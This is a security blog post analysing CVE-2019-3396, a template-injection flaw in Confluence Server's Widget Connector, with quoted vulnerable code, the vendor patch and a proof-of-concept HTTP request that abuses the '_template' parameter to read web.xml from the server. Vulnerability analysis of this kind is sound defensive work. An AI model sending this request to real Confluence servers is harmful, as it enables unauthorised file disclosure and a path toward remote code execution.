Chybeta

【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html

Analysis

According to the document , there are three parameters that you can set to control the content or format of the macro output, including URL、Width and Height.

the Widget Connector has defind some renders. for example the FriendFeedRenderer:

1
2
3
4
5
6
7
8
9
public class FriendFeedRenderer implements WidgetRenderer
{
...
public String getEmbeddedHtml(String url, Map<String, String> params) {
params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
return this.velocityRenderService.render(getEmbedUrl(url), params);
}
}

In FriendFeedRenderer‘s getEmbeddedHtml function , you will see they put another option _template into params map.

However, some other renderers, such as in video category , just call render(getEmbedUrl(url), params) directly

So in this situation, we can "offer" the _template ourseleves which the backend will use the params to render

Reproduce

1
2
3
POST /rest/tinymce/1/macro/preview HTTP/1.1
{"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}}

RCE

Patch

in fix version, it will call doSanitizeParameters before render html which will remove the _template in parameters. The code may like this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
public class WidgetMacro
extends BaseMacro
implements Macro, EditorImagePlaceholder
{
public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory)
{
...
this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
}
...
public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
...
doSanitizeParameters(parameters);
return this.renderManager.getEmbeddedHtml(url, parameters);
}
private void doSanitizeParameters(Map<String, String> parameters)
{
Objects.requireNonNull(parameters);
for (String sanitizedParameter : this.sanitizeFields) {
parameters.remove(sanitizedParameter);
}
}
}

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector

文章作者:chybeta

发布时间:2019年04月06日 - 13:04

最后更新:2019年04月08日 - 17:04

原始链接:http://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。